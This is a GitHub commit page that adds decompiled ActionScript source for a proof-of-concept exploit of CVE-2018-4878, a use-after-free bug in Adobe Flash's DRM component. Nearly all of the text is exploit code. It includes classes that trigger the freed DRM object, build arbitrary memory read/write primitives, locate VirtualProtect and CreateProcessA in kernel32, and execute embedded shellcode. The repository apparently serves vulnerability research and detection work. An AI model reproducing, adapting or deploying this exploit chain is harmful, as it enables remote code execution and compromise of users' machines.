Skip to content

Commit 3cb93b0

Browse files
pedramaminipedramamini
committedFeb 9, 2018
added PoC from morphisec
1 parent f03757f commit 3cb93b0

12 files changed

+1070
-0
lines changed
 

‎CVE-2018-4878-Adobe-Flash-DRM-UAF-0day/swf-53fa83d02cc60765a75abd0921f5084c03e0b7521a61c4260176e68b6a402834-dfi/DRM_obj.as

+92
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,92 @@
1+
package
2+
{
3+
import com.adobe.tvsdk.mediacore.DRMOperationCompleteListener;
4+
5+
public class DRM_obj implements DRMOperationCompleteListener
6+
{
7+
8+
9+
var a1:uint = 4369;
10+
11+
var a2:uint = 8738;
12+
13+
var a3:uint = 13107;
14+
15+
var a4:uint = 17476;
16+
17+
var a5:uint = 21845;
18+
19+
var a6:uint = 26214;
20+
21+
var a7:uint = 30583;
22+
23+
var a8:uint = 34952;
24+
25+
var a9:uint = 39321;
26+
27+
var a10:uint = 43690;
28+
29+
var a11:uint = 4369;
30+
31+
var a12:uint = 8738;
32+
33+
var a13:uint = 13107;
34+
35+
var a14:uint = 17476;
36+
37+
var a15:uint = 21845;
38+
39+
var a16:uint = 26214;
40+
41+
var a17:uint = 30583;
42+
43+
var a18:uint = 34952;
44+
45+
var a19:uint = 39321;
46+
47+
var a20:uint = 43690;
48+
49+
var a21:uint = 4369;
50+
51+
var a22:uint = 8738;
52+
53+
var a23:uint = 13107;
54+
55+
var a24:uint = 17476;
56+
57+
var a25:uint = 21845;
58+
59+
var a26:uint = 26214;
60+
61+
var a27:uint = 30583;
62+
63+
var a28:uint = 34952;
64+
65+
var a29:uint = 39321;
66+
67+
var a30:uint = 43690;
68+
69+
var a31:uint = 4369;
70+
71+
var a32:uint = 8738;
72+
73+
var a33:uint = 13107;
74+
75+
var a34:uint = 17476;
76+
77+
var a35:uint = 17476;
78+
79+
public function DRM_obj()
80+
{
81+
super();
82+
}
83+
84+
public function onDRMOperationComplete() : void
85+
{
86+
}
87+
88+
public function onDRMError(param1:uint, param2:uint, param3:String, param4:String) : void
89+
{
90+
}
91+
}
92+
}

‎CVE-2018-4878-Adobe-Flash-DRM-UAF-0day/swf-53fa83d02cc60765a75abd0921f5084c03e0b7521a61c4260176e68b6a402834-dfi/MainExp.as

+29
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,29 @@
1+
package
2+
{
3+
import flash.display.Sprite;
4+
import flash.utils.ByteArray;
5+
import flash.utils.Endian;
6+
7+
public class MainExp extends Sprite
8+
{
9+
10+
public static var var_1:Class = shellcodBytes;
11+
12+
public static var data14:ByteArray;
13+
14+
15+
private var var_3:UAFGenerator;
16+
17+
public function MainExp()
18+
{
19+
super();
20+
data14 = new var_1() as ByteArray;
21+
data14.endian = Endian.LITTLE_ENDIAN;
22+
this.var_3 = new UAFGenerator(this);
23+
}
24+
25+
public function flash21() : void
26+
{
27+
}
28+
}
29+
}

‎CVE-2018-4878-Adobe-Flash-DRM-UAF-0day/swf-53fa83d02cc60765a75abd0921f5084c03e0b7521a61c4260176e68b6a402834-dfi/Mem_Arr.as

+64
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,64 @@
1+
package
2+
{
3+
import flash.utils.ByteArray;
4+
5+
public dynamic class Mem_Arr extends ByteArray
6+
{
7+
8+
9+
var a1:uint = 17;
10+
11+
var a2:uint = 34;
12+
13+
var a3:uint = 51;
14+
15+
var a4:uint = 68;
16+
17+
var a5:uint = 85;
18+
19+
var a6:uint = 102;
20+
21+
var a7:uint = 119;
22+
23+
var a8:uint = 136;
24+
25+
var a9:uint = 153;
26+
27+
var a10:uint = 170;
28+
29+
var a11:uint = 187;
30+
31+
var a12:Object;
32+
33+
var a13:Object;
34+
35+
public function Mem_Arr()
36+
{
37+
super();
38+
this.a12 = this;
39+
}
40+
41+
public function flash25() : Object
42+
{
43+
var _loc_:Object = this.flash27(this.a13 as Number);
44+
return _loc_;
45+
}
46+
47+
public function flash26(param1:int, parm2:Object) : void
48+
{
49+
this["a" + param1++] = parm2.low;
50+
this["a" + param1] = parm2.hi;
51+
}
52+
53+
public function flash27(param1:Number) : Object
54+
{
55+
this.position = 0;
56+
this.writeDouble(param1);
57+
this.position = 0;
58+
return {
59+
"hi":this.readUnsignedInt(),
60+
"low":this.readUnsignedInt()
61+
};
62+
}
63+
}
64+
}

‎CVE-2018-4878-Adobe-Flash-DRM-UAF-0day/swf-53fa83d02cc60765a75abd0921f5084c03e0b7521a61c4260176e68b6a402834-dfi/Primit.as

+106
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,106 @@
1+
package
2+
{
3+
import flash.system.Capabilities;
4+
5+
public class Primit
6+
{
7+
8+
static var flash21:Mem_Arr;
9+
10+
static var flash39:DRM_obj;
11+
12+
static var flash27:uint;
13+
14+
public static var flash70:Boolean;
15+
16+
public static var flash72:Boolean;
17+
18+
public static var var_19:Boolean;
19+
20+
{
21+
flash70 = Capabilities.isDebugger;
22+
flash72 = Capabilities.version.toUpperCase().search("WIN") >= 0;
23+
var_19 = Capabilities.version.toUpperCase().search("MAC") >= 0;
24+
}
25+
26+
public function Primit()
27+
{
28+
super();
29+
}
30+
31+
static function flash32(param1:uint) : uint
32+
{
33+
if(param1 < 4096 || param1 >= 3221225472)
34+
{
35+
throw new Error("");
36+
}
37+
flash21.position = param1;
38+
return flash21.readUnsignedInt();
39+
}
40+
41+
static function flash34(param1:uint, param2:uint) : *
42+
{
43+
if(param1 < 4096 || param1 >= 3221225472)
44+
{
45+
throw new Error("");
46+
}
47+
flash21.position = param1;
48+
flash21.writeUnsignedInt(param2);
49+
}
50+
51+
static function flash35(param1:Object) : uint
52+
{
53+
flash21.a13 = param1;
54+
return flash39.a32 - 1;
55+
}
56+
57+
static function flash36(param1:Object) : uint
58+
{
59+
var _loc2_:uint = flash35(param1) + 24;
60+
_loc2_ = flash32(_loc2_);
61+
if(!flash27)
62+
{
63+
while(flash27 < 50 && flash32(_loc2_ + flash27) != param1[0])
64+
{
65+
flash27 = flash27 + 4;
66+
}
67+
if(flash27 >= 50)
68+
{
69+
throw new Error("");
70+
}
71+
}
72+
return _loc2_ + flash27;
73+
}
74+
75+
public static function flash20(:Mem_Arr, :DRM_obj) : *
76+
{
77+
var var_7:uint = 0;
78+
var Primit0:uint = 0;
79+
var var_11:Mem_Arr = param1;
80+
try
81+
{
82+
flash21 = var_11;
83+
var_7 = var_11.length;
84+
flash39 = param2;
85+
if(var_7 != 4294967295)
86+
{
87+
throw new Error("");
88+
}
89+
if(!flash72)
90+
{
91+
throw new Error("");
92+
}
93+
gadget.flash20();
94+
return;
95+
}
96+
catch(e:Error)
97+
{
98+
return;
99+
}
100+
}
101+
102+
public static function method_3(param1:uint) : String
103+
{
104+
}
105+
}
106+
}

‎CVE-2018-4878-Adobe-Flash-DRM-UAF-0day/swf-53fa83d02cc60765a75abd0921f5084c03e0b7521a61c4260176e68b6a402834-dfi/UAFGenerator.as

+107
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,107 @@
1+
package
2+
{
3+
import com.adobe.tvsdk.mediacore.MediaPlayer;
4+
import com.adobe.tvsdk.mediacore.PSDK;
5+
import com.adobe.tvsdk.mediacore.PSDKEventDispatcher;
6+
import flash.events.TimerEvent;
7+
import flash.net.LocalConnection;
8+
import flash.utils.Endian;
9+
import flash.utils.Timer;
10+
11+
public class UAFGenerator
12+
{
13+
14+
15+
var var_16:DRM_obj;
16+
17+
var var_15:MediaPlayer;
18+
19+
var var_13:DRM_obj;
20+
21+
var var_17:Mem_Arr;
22+
23+
var var_14:Timer;
24+
25+
var var_18:uint;
26+
27+
var var_1:MainExp;
28+
29+
public function UAFGenerator(param1:MainExp)
30+
{
31+
var param1:MainExp = param1;
32+
;
33+
super();
34+
this.var_1 = param1;
35+
this.method_2();
36+
try
37+
{
38+
new LocalConnection().connect("foo");
39+
new LocalConnection().connect("foo");
40+
}
41+
catch(e:Error)
42+
{
43+
this.var_13 = new DRM_obj();
44+
}
45+
this.var_14 = new Timer(100,1000);
46+
this.var_14.addEventListener("timer",this.method_1);
47+
this.var_14.start();
48+
}
49+
50+
public function method_2() : void
51+
{
52+
var _loc1_:PSDK = PSDK.pSDK;
53+
var _loc2_:PSDKEventDispatcher = _loc1_.createDispatcher();
54+
this.var_15 = _loc1_.createMediaPlayer(_loc2_);
55+
this.var_16 = new DRM_obj();
56+
this.var_15.drmManager.initialize(this.var_16);
57+
this.var_16 = null;
58+
}
59+
60+
public function method_1(param1:TimerEvent) : void
61+
{
62+
if(this.var_13.a1 != 4369)
63+
{
64+
this.var_14.stop();
65+
this.flash25();
66+
}
67+
}
68+
69+
public function flash24() : void
70+
{
71+
}
72+
73+
public function flash25() : void
74+
{
75+
var _loc1_:int = 0;
76+
var _loc2_:uint = null;
77+
this.var_17 = new Mem_Arr();
78+
this.var_17.length = 512;
79+
if(this.var_13.a14 != 0)
80+
{
81+
_loc1_ = 0;
82+
while(_loc1_ < 5)
83+
{
84+
this.var_13.a32 = this.var_13.a14 + 8 * _loc1_ + 7;
85+
this.var_17.flash26(_loc1_ * 2 + 1,this.var_17.flash25());
86+
_loc1_++;
87+
}
88+
this.var_17.a11 = 0;
89+
this.var_18 = uint(uint(this.var_13.a14));
90+
this.var_13.a14 = this.var_13.a31 + 19 * 4 + 16 - 1;
91+
_loc2_ = this.var_13.a22 ^ this.var_13.a26;
92+
this.var_13.a22 = 0;
93+
this.var_13.a23 = -1;
94+
this.var_13.a24 = -1;
95+
this.var_13.a26 = this.var_13.a22 ^ _loc2_;
96+
this.var_13.a27 = this.var_13.a23 ^ _loc2_;
97+
this.var_13.a28 = this.var_13.a24 ^ _loc2_;
98+
this.var_13.a29 = this.var_13.a25 ^ _loc2_;
99+
this.var_17.endian = Endian.LITTLE_ENDIAN;
100+
Primit.flash20(this.var_17,this.var_13);
101+
this.var_13.a14 = this.var_18;
102+
return;
103+
}
104+
this.var_1.flash21();
105+
}
106+
}
107+
}

‎CVE-2018-4878-Adobe-Flash-DRM-UAF-0day/swf-53fa83d02cc60765a75abd0921f5084c03e0b7521a61c4260176e68b6a402834-dfi/gadget.as

+179
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,179 @@
1+
package
2+
{
3+
class gadget extends Primit
4+
{
5+
6+
static var CreateProcessFunc:uint;
7+
8+
static var method_2:uint;
9+
10+
11+
function gadget()
12+
{
13+
super();
14+
}
15+
16+
static function flash1000(param1:uint = 0, ... rest) : *
17+
{
18+
}
19+
20+
static function findfunc() : uint
21+
{
22+
var b0:uint = 0;
23+
var b:uint = 0;
24+
var var_12:uint = 0;
25+
var size:uint = 0;
26+
var oft:uint = 0;
27+
var ft:uint = 0;
28+
var gadget3:uint = 0;
29+
var c:int = 0;
30+
try
31+
{
32+
for(b0 = flash32(flash35(flash21)) & 4294901760,b = b0 - 8388608; var_12 < 512; )
33+
{
34+
if((flash32(b) & 65535) == 23117)
35+
{
36+
b0 = 0;
37+
break;
38+
}
39+
var_12++;
40+
b = b - 65536;
41+
}
42+
if(!b0)
43+
{
44+
method_2 = b;
45+
b0 = b + flash32(b + 60);
46+
if(flash32(b0) == 17744)
47+
{
48+
size = flash32(b0 + 132);
49+
for(b0 = b + flash32(b0 + 128),var_12 = 3 * 4; var_12 < size; var_12 = var_12 + 5 * 4)
50+
{
51+
flash21.position = b + flash32(b0 + var_12);
52+
if(flash21.readUTFBytes(12).toLowerCase() == "kernel32.dll")
53+
{
54+
oft = flash32(b0 + var_12 - 3 * 4);
55+
ft = flash32(b0 + var_12 + 4);
56+
break;
57+
}
58+
}
59+
if(!(oft == 0 || ft == 0))
60+
{
61+
oft = oft + b;
62+
var_12 = 0;
63+
while(var_12 < 256)
64+
{
65+
b0 = flash32(oft);
66+
if(b0 == 0)
67+
{
68+
throw new Error("");
69+
}
70+
flash21.position = b + b0;
71+
if(flash21.readUTF().toLowerCase() == "virtualprotect")
72+
{
73+
gadget3 = flash32(b + ft + var_12 * 4);
74+
c++;
75+
if(c > 1)
76+
{
77+
break;
78+
}
79+
}
80+
else
81+
{
82+
flash21.position = b + b0;
83+
if(flash21.readUTF().toLowerCase() == "createprocessa")
84+
{
85+
CreateProcessFunc = flash32(b + ft + var_12 * 4);
86+
c++;
87+
if(c > 1)
88+
{
89+
break;
90+
}
91+
}
92+
}
93+
var_12++;
94+
oft = oft + 4;
95+
}
96+
return gadget3;
97+
}
98+
throw new Error("");
99+
}
100+
throw new Error("");
101+
}
102+
throw new Error("");
103+
}
104+
catch(e:Error)
105+
{
106+
throw new Error("");
107+
}
108+
return 0;
109+
}
110+
111+
static function method_5(param1:uint, param2:uint, param3:uint) : *
112+
{
113+
var _loc4_:uint = 0;
114+
flash1000();
115+
var _loc5_:uint = flash35(flash1000);
116+
var _loc6_:uint = flash32(flash32(flash32(_loc5_ + 8) + 20) + 4) + (!!flash70?188:176);
117+
if(flash32(_loc6_) < 65536)
118+
{
119+
_loc6_ = _loc6_ + 4;
120+
}
121+
_loc6_ = flash32(_loc6_);
122+
var _loc7_:uint = flash32(_loc6_);
123+
var _loc8_:uint = flash32(_loc5_ + 28);
124+
var _loc9_:uint = flash32(_loc5_ + 32);
125+
var _loc10_:Vector.<uint> = new Vector.<uint>(256);
126+
while(_loc4_ < 256)
127+
{
128+
_loc10_[_loc4_] = flash32(_loc7_ - 128 + _loc4_ * 4);
129+
_loc4_++;
130+
}
131+
_loc10_[32 + 7] = param1;
132+
flash34(_loc5_ + 28,param2);
133+
flash34(_loc5_ + 32,param3);
134+
flash34(_loc6_,flash36(_loc10_) + 128);
135+
var _loc11_:Array = new Array(65);
136+
var _loc12_:* = flash1000.call.apply(null,_loc11_);
137+
flash34(_loc6_,_loc7_);
138+
flash34(_loc5_ + 28,_loc8_);
139+
flash34(_loc5_ + 32,_loc9_);
140+
}
141+
142+
static function flash20() : *
143+
{
144+
var s:int = 0;
145+
var flash2003:Array = null;
146+
var flash2005:Vector.<uint> = null;
147+
var res:* = undefined;
148+
var flash2004:String = null;
149+
try
150+
{
151+
flash2003 = [];
152+
MainExp.data14.position = 0;
153+
for(s = 0; s < MainExp.data14.length; s = s + 4)
154+
{
155+
flash2003.push(MainExp.data14.readUnsignedInt());
156+
}
157+
flash2005 = Vector.<uint>(flash2003);
158+
var gadget4:uint = flash36(flash2005);
159+
var gadget7:uint = findfunc();
160+
if(gadget7 != 0)
161+
{
162+
method_5(gadget7,gadget4,flash2005.length * 4);
163+
var gadget8:uint = flash35(flash1000);
164+
gadget8 = flash32(flash32(gadget8 + 28) + 8) + 4;
165+
var gadget9:uint = flash32(gadget8);
166+
flash34(gadget8,gadget4);
167+
res = flash1000.call(null,CreateProcessFunc);
168+
flash34(gadget8,gadget9);
169+
return;
170+
}
171+
throw new Error("");
172+
}
173+
catch(e:Error)
174+
{
175+
throw new Error("");
176+
}
177+
}
178+
}
179+
}

‎CVE-2018-4878-Adobe-Flash-DRM-UAF-0day/swf-53fa83d02cc60765a75abd0921f5084c03e0b7521a61c4260176e68b6a402834-dfi/mx/core/ByteArrayAsset.as

+18
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,18 @@
1+
package mx.core
2+
{
3+
import flash.utils.ByteArray;
4+
5+
use namespace mx_internal;
6+
7+
public class ByteArrayAsset extends ByteArray implements IFlexAsset
8+
{
9+
10+
mx_internal static const VERSION:String = "4.6.0.23201";
11+
12+
13+
public function ByteArrayAsset()
14+
{
15+
super();
16+
}
17+
}
18+
}

‎CVE-2018-4878-Adobe-Flash-DRM-UAF-0day/swf-53fa83d02cc60765a75abd0921f5084c03e0b7521a61c4260176e68b6a402834-dfi/mx/core/IFlexAsset.as

+7
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,7 @@
1+
package mx.core
2+
{
3+
public interface IFlexAsset
4+
{
5+
6+
}
7+
}

‎CVE-2018-4878-Adobe-Flash-DRM-UAF-0day/swf-53fa83d02cc60765a75abd0921f5084c03e0b7521a61c4260176e68b6a402834-dfi/mx/core/mx_internal.as

+4
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,4 @@
1+
package mx.core
2+
{
3+
public namespace mx_internal = "http://www.adobe.com/2006/flex/mx/internal";
4+
}

‎CVE-2018-4878-Adobe-Flash-DRM-UAF-0day/swf-53fa83d02cc60765a75abd0921f5084c03e0b7521a61c4260176e68b6a402834-dfi/shellcodBytes.as

+15
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,15 @@
1+
package
2+
{
3+
import mx.core.ByteArrayAsset;
4+
5+
[ExcludeClass]
6+
public class shellcodBytes extends ByteArrayAsset
7+
{
8+
9+
10+
public function shellcodBytes()
11+
{
12+
super();
13+
}
14+
}
15+
}

‎CVE-2018-4878-Adobe-Flash-DRM-UAF-0day/swf-53fa83d02cc60765a75abd0921f5084c03e0b7521a61c4260176e68b6a402834.report

+449
Large diffs are not rendered by default.

0 commit comments

Comments
 (0)
Please sign in to comment.